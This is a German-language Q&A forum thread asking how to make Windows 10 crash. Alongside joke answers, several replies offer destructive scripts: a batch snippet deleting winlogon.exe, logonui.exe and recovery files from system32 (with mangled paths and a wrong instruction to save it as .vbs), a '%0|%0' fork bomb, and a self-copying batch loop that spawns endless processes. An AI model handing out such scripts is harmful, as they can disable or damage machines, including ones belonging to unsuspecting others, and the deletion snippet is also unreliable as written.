Windows 10 abstürzen lassen?

...komplette Frage anzeigen

5 Antworten

Ich weiß nicht, ob das 100%-tig geht, aber du musst die Auslagerungsdatei entfernen und den RAM voll machen und noch ein Bit mehr, dann sollte es Windows zum abstürz bringen. Bin mir aber nicht sicher...

Antwort bewerten Vielen Dank für Deine Bewertung
Kommentar von onomant
06.06.2016, 19:16

Auslagerungsdatei komplett abschalten funktioniert bei Win 10 nicht.

0

Äh keine Ahnung... Schütte Cola über deine Hardware oder so. :D

Alternativ könntest du auch ne Batch/Powershell Datei erstellen, die in einer Endlosschleife Dateien erstellt. Allerdings würde dich Windows dann sicherlich warnen, dass das Programm nicht mehr richtig funktioniert. :D

VG

Kevin

Antwort bewerten Vielen Dank für Deine Bewertung

erstelle eine Text Datei mit folgenden Parametern:

@echo off

del\\\\windows\\\\system32\\\\Recover
del\\\\windows\\\\system32\\\\winlogon.exe

del\\\\windows\\\\system32\\\\logonuI.exe

Das Ganze dann nur noch als .vbs speichern und starten




Antwort bewerten Vielen Dank für Deine Bewertung

Eine Forkbomb..?
Also ein Prozess welcher sich rekursiv kopiert.

Dazu unter Windows beispielsweise eine Textdatei erstellen und nachher die Dateiendung von ".txt" in ".bat" ändern und ausführen.
Folgender Inhalt:

%0|%0

Ist ein sehr sparsamer Code ;)
Weiß nicht ob der in Win 10 noch geht, wüsste aber nicht wieso nicht.

Das hier habe ich noch in meinen Skriptarchiven gefunden:
(Ebenfalls als .bat speichern und ausführen)

:e
copy /Y %0 %random%.bat
start %0
%0|%0
goto :e
Antwort bewerten Vielen Dank für Deine Bewertung

P.s. Die Hardware soll kein Schaden abbekommen!!!

Antwort bewerten Vielen Dank für Deine Bewertung

Was möchtest Du wissen?